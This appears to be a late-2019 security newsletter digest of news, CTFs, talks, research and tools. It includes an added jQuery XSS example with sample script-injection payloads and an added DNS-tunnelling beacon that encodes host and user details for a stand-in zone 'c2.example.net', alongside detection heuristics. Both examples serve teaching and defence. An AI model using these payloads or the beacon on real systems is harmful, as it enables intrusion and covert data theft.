Word of the week
“The Holiday Phish”: 39% of Employees Gave Away Their Passwords to This Simulated Phishing Email
Word of the week special
“Crypto Can Be Cracked … Through Walls”
Watch out for those side channels.
The cracking of encryption keys has usually involved brute-force methods or attacks on flaws in the implementation. There is, though, increasing interest in physical side-channel attacks, where information about cryptographic operations leaks unintentionally through electromagnetic radiation, power consumption, voltage fluctuations, and even sound and thermal variations. Few companies currently protect their devices against side-channel attacks, especially as doing so is costly and requires extensive testing with complex equipment.
Devices, too, are becoming faster, and as they do they are likely to emit increasing amounts of radio-frequency and electromagnetic (EM) energy. A 2 GHz processor, for example, runs at roughly the same frequency as 2.4 GHz Wi-Fi, and chips are often not shielded against radiating at that frequency: the emission is a natural by-product of fast switching. At these frequencies it is difficult to stop EM emissions, and equally difficult to stop them coupling into nearby wires and other circuits.
“Digital Footprints and Shadows”
Like it or not, everything we do in the virtual world we loosely call “The Internet” leaves a trace, and no matter how hard we try we cannot truly remove all evidence of our actions. Definitions vary, but a footprint (or Digital Footprint) is essentially the trace we leave as a result of our direct actions: browsing websites, downloading apps, streaming videos, subscribing to content, and using cloud email services such as Gmail
Connection to the CLOUD
Really simple, done! – thanks to Jinshu
Not sure what to study for in 2020? Here you go!
Link HERE – thanks to Naz
State of the art security for a pentest labs website
Link HERE – thanks to Prash
Crypto challenge of the week
CTF Challenges – try the challenges!
Link HERE – thanks to Venkat
GitHub Security Lab CTF 3: XSS-unsafe jQuery plugins
Do you want to challenge your vulnerability hunting skills and to quickly learn Semmle CodeQL?
Your mission, should you choose to accept it, is to find variants of jQuery plugins that expose their clients to undocumented XSS (cross-site scripting) vulnerabilities. You will do this by utilizing CodeQL, our simple, yet expressive, code query language. To capture the flag, you’ll need to write a query that finds the unsafely implemented jQuery plugins in Bootstrap, using this step by step guide
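The sink the CTF is about is the one-argument form of `$()`: jQuery decides, from the string alone, whether to treat it as markup to create or a selector to find. The following is an added example (not code from the CTF, from Bootstrap or from jQuery): it re-implements the string test from `jQuery.fn.init` (the regular expression and the `<...>` fast path are the ones jQuery uses), puts the unsafe plugin pattern beside a guarded one, and finishes with a crude textual scan for the sink shape. The option names, sample values and plugin fragment are made up for illustration.

```javascript
'use strict';

// Added example, not code from the CTF, Bootstrap or jQuery. Re-implements the
// test jQuery.fn.init applies to $(str) to show why $(options.target) is an XSS
// sink when the option is attacker-controlled. Option names and the plugin
// fragment below are invented for illustration.

// jQuery's quick test for "this string is markup" or "this string is #id".
const rquickExpr = /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]+))$/;

// What jQuery does with $(str) when no context is passed:
//   'html'     -> str is parsed as markup and elements are created (XSS sink)
//   'id'       -> document.getElementById
//   'selector' -> the CSS selector engine, which rejects markup with an error
function classifyDollarArg(str) {
  if (typeof str !== 'string' || str.length === 0) return 'other';
  let match;
  if (str[0] === '<' && str[str.length - 1] === '>' && str.length >= 3) {
    match = [null, str, null];               // fast path: whole string is markup
  } else {
    match = rquickExpr.exec(str);            // leading whitespace, "<b>junk", etc.
  }
  if (match && match[1]) return 'html';
  if (match && match[2]) return 'id';
  return 'selector';
}

// Unsafe plugin pattern the CTF hunts for: an option documented as a selector
// goes straight into $(). Here we return what jQuery would do rather than do it.
function resolveTargetUnsafe(options) {
  return classifyDollarArg(options.target);   // in a real plugin: $(options.target)
}

// Guarded pattern: refuse anything jQuery would parse as markup, and in the
// real plugin use $(document).find(sel) so only selector semantics ever apply.
function resolveTargetSafe(options) {
  const target = options.target;
  if (classifyDollarArg(target) === 'html') {
    throw new Error('target must be a selector, not markup: ' + target);
  }
  return 'selector';                          // in a real plugin: $(document).find(target)
}

// Constructed values as they might appear in a data-target attribute.
const samples = {
  benignId: '#modal',
  benignClass: '.collapse-panel',
  payload: '<img src=x onerror=alert(document.domain)>',
  paddedPayload: '  <svg/onload=alert(1)> trailing text',
};

// Crude textual first pass for the sink shape ($(options.x), $(this.options.x),
// $(config.x), $(settings.x)). CodeQL tracks the data flow properly; this regex
// only catches the literal shape and misses an option copied into a local first.
const sinkShape = /\$\(\s*(?:this\.)?(?:options|settings|config)\.(\w+)\s*\)/g;
function findDollarOptionSinks(source) {
  return Array.from(source.matchAll(sinkShape), (m) => m[1]);
}

// Constructed plugin fragment for the scan (two unsafe lines, two safe ones).
const pluginSource = `
  this.$parent   = $(this.options.parent);                    // unsafe
  var $target    = $(options.target);                         // unsafe
  this.$viewport = $(document).find(this.options.viewport);   // safe
  this.$element  = $(element);                                // not an option
`;

for (const [name, value] of Object.entries(samples)) {
  console.log(name.padEnd(14), '->', classifyDollarArg(value));
}
console.log('option sinks:', findDollarOptionSinks(pluginSource));
```

Note that passing a context, as in `$(str, document)`, does not help: jQuery still parses a markup string and only uses the context as the owner document. Only `.find()` (or `$.find`) guarantees selector semantics, which is why the guarded pattern above is the shape of fix to look for.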
HackingLab Christmas Advent Challenge
I got this little image, but it looks like the best part got censored on the way. Even the tiny preview icon looks clearer than this! Maybe they missed something that would let you restore the original content?
EU countries fail to agree on privacy rules governing WhatsApp, Skype
“It looks like amateur satellite trackers found the secret satellite that Trump tweeted the picture from. It’s evidently an NRO HK-11 model, with what’s essentially a Hubble Telescope pointed towards the Earth”
Book of the month
The Secure Development Handbook
Peerlyst Community eBook: 32 Influential Malware Research Professionals
Comic of the week
##Some OWASP stuff first
-Android App Reverse Engineering 101
-When clean code intended to help security can do the opposite
-Research shows reliance on open source components can be risky
-How does Static Code Analysis work – the Fortify flavour
-A Microsoft DevSecOps Static Application Security Testing (SAST) Exercise
Static Application Security Testing (SAST) is a critical DevSecOps practice. As engineering organizations accelerate continuous delivery to impressive levels, it’s important to ensure that continuous security validation keeps up. To do so most effectively requires a multi-dimensional application of static analysis tools. The more customizable the tool, the better you can shape it to your actual security risk
-An Introduction to Buffer Overflow Vulnerability
The art of memory exploitation
OWASP events HERE
All InfoSec events HERE
The complete Security Events calendar – Peerlyst
AWS re:Invent presentations
AWS re:Invent 2019 – Keynote with Dr. Werner Vogels
AWS re:Invent 2019: Why you need a ledger database: BMW, DVLA, & Sage discuss use cases
AWS re:Invent 2019: Top 5 container and Kubernetes best practices
AWS re:Invent 2019: Remote desktop and application streaming with NICE DCV
AWS re:Invent 2019: Application configuration as code
AWS re:Invent 2019: Strong security made simple: Putting all the pieces together
AWS re:Invent 2019: [REPEAT 1] Vulnerability disclosure and response with AWS security
AWS re:Invent 2019: It’s always day zero: Working on open source and security
AWS re:Invent 2019: Prepare for & respond to security incidents in your AWS environment
AWS re:Invent 2019: [REPEAT] Detect network and security anomalies with Traffic Mirroring
AWS re:Invent 2019: Leadership session: AWS security
AWS re:Invent 2019: Life hacks for automating DevSecOps security tasks
AWS re:Invent 2019: [REPEAT] Master your security in the cloud
AWS re:Invent 2019: Protecting you from you: Misconfiguration-caused breaches
AWS re:Invent 2019: Speculation & leakage: Timing side channels & multi-tenant computing
DevSecCon London 2019 Day 2 Siren Hofvander – Progress, Not Just Motion Security, the Hero’s Journey
All presentations are HERE
Blackhat London 2019
Keynote: Blue to Red: Traversing the Spectrum by Amanda Rousseau
Link HERE More next week
Global ALERT level
BLUE or GUARDED indicates a general risk of increased hacking, virus, or other malicious activity. The potential exists for malicious cyber activities, but no known exploits have been identified, or known exploits have been identified but no significant impact has occurred.
Incident data HERE Find your country
NCSC Weekly Threat Report
Consumers prepare for Black Friday & Cyber Monday
The Black Friday and Cyber Monday sales are now upon us with consumers set to be tempted with bargains this weekend and beyond.
T-Mobile breach affects more than a million customers
API Security Issue 60 – Microsoft Azure OAuth2 Vulnerability, 5G Threat Landscape, Webinars
Incidents & events detail
The StrandHogg vulnerability
Cyber criminal charged with stealing £76m while working for Russian intelligence
Hackers calling themselves ‘Evil Corp’ have been sanctioned by the US Treasury as a criminal indictment against them is unsealed
Evil Corp. Hacking Group Indictments
US federal prosecutors have indicted Maksim Yakubets and Igor Turashev, who are allegedly members of the hacking group known as Evil Corp. The pair allegedly “led one of the most sophisticated transnational cybercrime syndicates in the world,” according to a US Department of Justice press release
Man-in-the-Middle Attack Used to Steal Venture Capital Investment
Hackers used a complex man-in-the-middle attack to steal approximately US $1 million from a Chinese venture capital firm that was supposed to be going to a start-up company in Israel. The hackers set up phony domains and spoofed emails between the companies, even going so far as to cancel a scheduled in-person meeting.
Atlassian scrambles to fix zero-day security hole accidentally disclosed on Twitter
Exposed private cert key may also be an issue for IBM Aspera.
Twitter security celeb SwiftOnSecurity on Tuesday inadvertently disclosed a zero-day vulnerability affecting enterprise software biz Atlassian, a flaw that may be echoed in IBM’s Aspera software.
New Linux Vulnerability Lets Attackers Hijack VPN Connections
Security researchers found a new vulnerability allowing potential attackers to hijack VPN connections on affected *NIX devices and inject arbitrary data payloads into IPv4 and IPv6 TCP streams.
The Evolution of Russia’s Dark Web
Smart refrigerator hack exposes Gmail login credentials
A bonus feature on a smart home product becomes a security liability
French officials say they are still considering a response to a cyber attack on a public hospital, including a possible “hack back.”
A popular website among hackers that sold spying tools was taken down after an international investigation
The British government says the site sold these tools to more than 14,500 people
Popular spyware company Hacking Team is making a comeback under new ownership
With the aim of ensuring their tools aren’t being abused
Great Cannon DDoS Tool Reportedly Being Used on Hong Kong Protesters’ Online Forum
A distributed denial-of-service (DDoS) tool known as the Great Cannon has reportedly been used against the LIHKG social media platform used by protesters in Hong Kong. China’s Great Cannon was first described by Citizen Lab in April 2015
Netflix ‘reactivated’ users without permission
BlackDirect: Microsoft Azure Account Takeover
Over the last few weeks, my team and I have been working on research associated with Microsoft Azure and Microsoft OAuth 2.0. Over the course of that time, we found a vulnerability that allows for the takeover of Microsoft Azure Accounts. Affecting specific Microsoft OAuth 2.0 applications, this particular vulnerability allows the creation of tokens with the victim’s permissions. This could let a malicious attacker access and control a victim’s account and take actions on their behalf
Custom Malware Development (Establishing A Shell Through the Target’s Browser) – Repurposing @beefproject & AutoIt
Research of the week
Featuring – Outrageous predictions
Looking into the future is something of a fool’s game, but it remains a useful exercise — helping prepare for what lies ahead by considering the full possible range of economic and political outcomes. This is where Saxo’s annual Outrageous Predictions fit in: not as a forecast for what 2020 will bring, but as an exercise in considering the full extent of what is possible, even if not necessarily probable. Inevitably the outcomes that prove the most disruptive (and therefore outrageous) are those that are a surprise to consensus
Link HERE – thanks to Naz
Formal Reasoning About the Security of Amazon Web Services
We report on the development and use of formal verification tools within Amazon Web Services (AWS) to increase the security assurance of its cloud infrastructure and to help customers secure themselves. We also discuss some remaining challenges that could inspire future research in the community
Link HERE – thanks to Alvin
Runtime Application Self-Protection (RASP), Investigation of the Effectiveness of a RASP Solution in Protecting Known Vulnerable Target Applications
Year after year, attackers target application-level vulnerabilities. To address these vulnerabilities, application security teams have increasingly focused on shifting left – identifying and fixing vulnerabilities earlier in the software development life cycle. However, at the same time, development and operations teams have been accelerating the pace of software release, moving towards continuous delivery. As software is released more frequently, gaps remain in test coverage leading to the introduction of vulnerabilities in production. To prevent these vulnerabilities from being exploited, it is necessary that applications become self-defending. RASP is a means to quickly make both new and legacy applications self-defending. However, because most applications are custom-coded and therefore unique, RASP is not one-size-fits-all – it must be trialled to ensure that it meets performance and attack protection goals. In addition, RASP integrates with critical applications, whose stakeholders typically span the entire organization. To convince these varied stakeholders, it is necessary to both prove the benefits and show that RASP does not adversely affect application performance or stability. This paper helps organizations that may be evaluating a RASP solution by outlining activities that measure the effectiveness and performance of a RASP solution against a given application portfolio
CertiKOS: A breakthrough toward hacker-resistant operating systems
A team of Yale researchers has unveiled CertiKOS, the world’s first operating system that runs on multi-core processors and shields against cyber attacks, a milestone that the scientists say could lead to a new generation of reliable and secure systems software.
Led by Zhong Shao, professor of computer science at Yale, the researchers developed an operating system that incorporates formal verification to ensure that a program performs precisely as its designers intended — a safeguard that could prevent the hacking of anything from home appliances and Internet of Things (IoT) devices to self-driving cars and digital currency
The Frugal Hacker: Hacking on a Shoestring Budget
“Being frugal pretty much comes with the territory as hackers”
Import Address Table (IAT) Hooking
A Windows Portable Executable (PE) contains a structure called the Import Address Table (IAT)
The IAT holds the addresses of the functions the executable imports from DLLs; the loader fills it in at load time and the program then calls those functions indirectly through it
It is possible to hook a function by overwriting its IAT entry with the address of a rogue function, which can optionally call the originally intended function afterwards so the program keeps working
Tool of the week
Amazon Fraud Detector
Amazon Fraud Detector is a fully managed service that makes it easy to identify potentially fraudulent online activities such as online payment fraud and the creation of fake accounts. Fraud Detector uses machine learning (ML) and 20 years of fraud detection expertise from AWS and Amazon.com to automatically identify potentially fraudulent activity so you can catch more fraud faster
Amazon Detective is a new service in Preview that makes it easy to analyze, investigate, and quickly identify the root cause of potential security issues or suspicious activities. Amazon Detective automatically collects log data from your AWS resources and uses machine learning, statistical analysis, and graph theory to build a linked set of data that enables you to easily conduct faster and more efficient security investigations.
Amazon CodeGuru is a new machine learning service for development teams who want to automate code reviews, identify the most expensive lines of code in their applications, and receive intelligent recommendations on how to fix or improve their code
DNS covert channel implant for Red Teams
WEASEL is a small in-memory implant written in Python 3 with no dependencies. The beacon client sends a small amount of identifying information about its host to a DNS zone you control, and the WEASEL server can task clients to execute pre-baked or arbitrary commands.
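The mechanism behind a beacon like this is simply encoding data into query names under a zone whose authoritative server the operator runs. The block below is an added example and not WEASEL's code: it shows one way a client packs host information into DNS labels within the RFC 1035 limits (63 characters per label, 253 for the whole name), how the server side reassembles possibly out-of-order queries, and the heuristics a defender would apply to the same names. The zone `c2.example.net`, the hex encoding, the `seq-total` header label and the client-id layout are assumptions for illustration, not WEASEL's wire format.

```javascript
'use strict';

// Added example, not WEASEL's code. Zone name, hex encoding and the
// "<seq>-<total>.<data labels>.<client id>.<zone>" layout are assumptions.

const ZONE = 'c2.example.net';   // assumed operator-controlled zone
const MAX_LABEL = 63;            // RFC 1035 limit per label
const MAX_NAME = 253;            // practical limit for the full name
const LABELS_PER_QUERY = 2;      // data labels carried per query name

// Client side: split the payload (hex encoded) across one or more query
// names. Each name carries a seq/total header so retries and reordering
// by intermediate resolvers do not corrupt the reassembled message.
function encodeBeacon(clientId, payload) {
  const hex = Buffer.from(payload, 'utf8').toString('hex');
  const perQuery = LABELS_PER_QUERY * MAX_LABEL;           // hex chars per query
  const total = Math.max(1, Math.ceil(hex.length / perQuery));
  const names = [];
  for (let seq = 0; seq < total; seq++) {
    const chunk = hex.slice(seq * perQuery, (seq + 1) * perQuery);
    const dataLabels = [];
    for (let i = 0; i < chunk.length; i += MAX_LABEL) {
      dataLabels.push(chunk.slice(i, i + MAX_LABEL));
    }
    const header = `${seq.toString(16)}-${total.toString(16)}`;
    const name = [header, ...dataLabels, clientId, ZONE].join('.');
    if (name.length > MAX_NAME) throw new Error('query name too long: ' + name.length);
    names.push(name);
  }
  return names;
}

// Server side (authoritative for ZONE): collect chunks per client and emit
// a message only once every sequence number has arrived.
function decodeBeacons(queryNames) {
  const perClient = new Map();
  for (const name of queryNames) {
    if (!name.endsWith('.' + ZONE)) continue;                 // not under our zone
    const labels = name.slice(0, -(ZONE.length + 1)).split('.');
    const header = /^([0-9a-f]+)-([0-9a-f]+)$/.exec(labels[0]);
    if (!header || labels.length < 2) continue;               // malformed, ignore
    const clientId = labels[labels.length - 1];
    const data = labels.slice(1, -1).join('');
    if (!/^[0-9a-f]*$/.test(data)) continue;
    const seq = parseInt(header[1], 16);
    const total = parseInt(header[2], 16);
    let state = perClient.get(clientId);
    if (!state) { state = { total, chunks: new Map() }; perClient.set(clientId, state); }
    state.chunks.set(seq, data);
  }
  const messages = {};
  for (const [clientId, state] of perClient) {
    if (state.chunks.size !== state.total) continue;          // still incomplete
    let hex = '';
    for (let i = 0; i < state.total; i++) hex += state.chunks.get(i);
    messages[clientId] = Buffer.from(hex, 'hex').toString('utf8');
  }
  return messages;
}

// Defender side: the usual tells for DNS tunnelling are long labels, long
// names, hex/base32-looking labels and high character entropy. Thresholds
// are illustrative starting points, not tuned values.
function labelEntropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const c of counts.values()) { const p = c / s.length; h -= p * Math.log2(p); }
  return h;
}
function suspiciousReasons(name) {
  const reasons = [];
  const labels = name.split('.');
  if (Math.max(...labels.map((l) => l.length)) >= 32) reasons.push('long-label');
  if (name.length > 100) reasons.push('long-name');
  if (labels.some((l) => l.length >= 16 && /^[0-9a-f]+$/.test(l))) reasons.push('hex-label');
  if (labelEntropy(labels.join('')) > 3.5) reasons.push('high-entropy');
  return reasons;
}

// Constructed host information as a beacon might report it.
const beaconNames = encodeBeacon('a1b2c3d4', 'hostname=ws-042;user=alice;os=win10');
console.log(beaconNames);
console.log(decodeBeacons(beaconNames));
console.log(suspiciousReasons(beaconNames[0]), suspiciousReasons('www.example.com'));
```

A practical point for both sides: because resolvers cache, a real client varies the names (the sequence header does that here) so each beacon is actually forwarded to the authoritative server, and that same property, many unique subdomains under one zone from one host, is what a defender counts per source when the per-name heuristics are inconclusive.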
Other interesting articles
##Misconceptions: Unrestricted Release of Offensive Security Tools
Uncontrolled distribution of Offensive Security Tools is an unnecessary contribution to real threat actor’s criminal and intelligence network operations
##World Quality Report: Shift your focus to QA for an app sec win
The fight to educate developers is far from over, but the majority of application security specialists believe that their companies and developers now have the policy chops and awareness to secure their software. Unfortunately, most development teams’ security tools and controls are failing to meet the need.
##Why We Need to Care About AI Sensitivity
Technology reflects, not erases, our biases.
It’s a truth that always bears repeating: computers only know what we program them to know. This basic fact has enabled the false idea that the value-neutral language of code erases the all-too-human qualities of prejudice from the equation. After all, we think of humans as fallible thinkers, prone to unfair judgments and biased decision-making. Machines should, in theory, be better — shouldn’t they?
##The Unbelievable Demand for Cybersecurity Workers
By 2021, there will be roughly 3.5 million unfilled cybersecurity jobs across the globe
“If someone has six months to a year of work and when they came in for an interview, they didn’t pee on the rug, they’re going to make in the neighborhood of $85,000.”
##And finally, THE FUTURE
No time was wasted. What was destined to be computed has been computed. The future is deterministic in the eye of itself. As a wise antique dealer would tell you, your life might as well have taken the most optimised path in a non-deterministic Turing machine of all life possibilities. What of is the path most optimised in terms? That is the gate to all mystery. Those who seek mystery are forever lost, and so are those who seek the future.
Perchance I am now back on track again to attempt another intersection with something great. With my dear sister this time. All the right pieces are gradually falling into place as they rapidly hot-swap in unfathomable ways. We are as confident we are going to inspire people and positively impact the world as we are skeptical if any of this makes sense. When the fascination for what shall arise has attached itself firmly to the precautionary tales of what shan’t, the prophecies collapse and the Tao remains undefined and truthful to its ontological amusement.
##HACKING, TOOLS and FUN – CHECK BELOW!
Description: XSS in GMail’s AMP4Email via DOM Clobbering.
Description: Reflected XSS in graph.facebook.com leads to account takeover in IE/Edge.